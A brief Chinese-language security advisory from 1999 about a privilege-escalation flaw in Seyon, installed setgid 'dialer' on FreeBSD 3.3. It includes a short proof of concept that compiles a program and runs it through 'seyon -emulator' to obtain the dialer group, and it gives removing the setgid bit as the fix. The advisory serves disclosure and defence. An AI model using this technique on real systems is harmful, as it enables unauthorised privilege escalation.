FreeBSD Seyon 存在漏洞发布时间:1999-12-01 更新时间:1999-12-01 严重程度:中 威胁程度:权限提升 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 BSD详细描述 FREEBSD3.3随带Seyon,是一个通信程序,存在几个漏洞允许恶意用户提升权限。seyon在FREEBSD中是以dialer的用户ID来进行的安装,通过对seyon漏洞的攻击,其一般用户可以运行访问通信设备或者通过其他程序来获得ROOT权限。 测试代码 bash-2.03$ echo 'void main() { system("/usr/bin/id"); }' > id.c bash-2.03$ gcc -o id id.c bash-2.03$ seyon -emulator ./id uid=1000(xnec) gid=1000(xnec) egid=68(dialer) groups=68(dialer), 1000(xnec) 解决方案 去掉Seyon的setgid位 相关信息 |
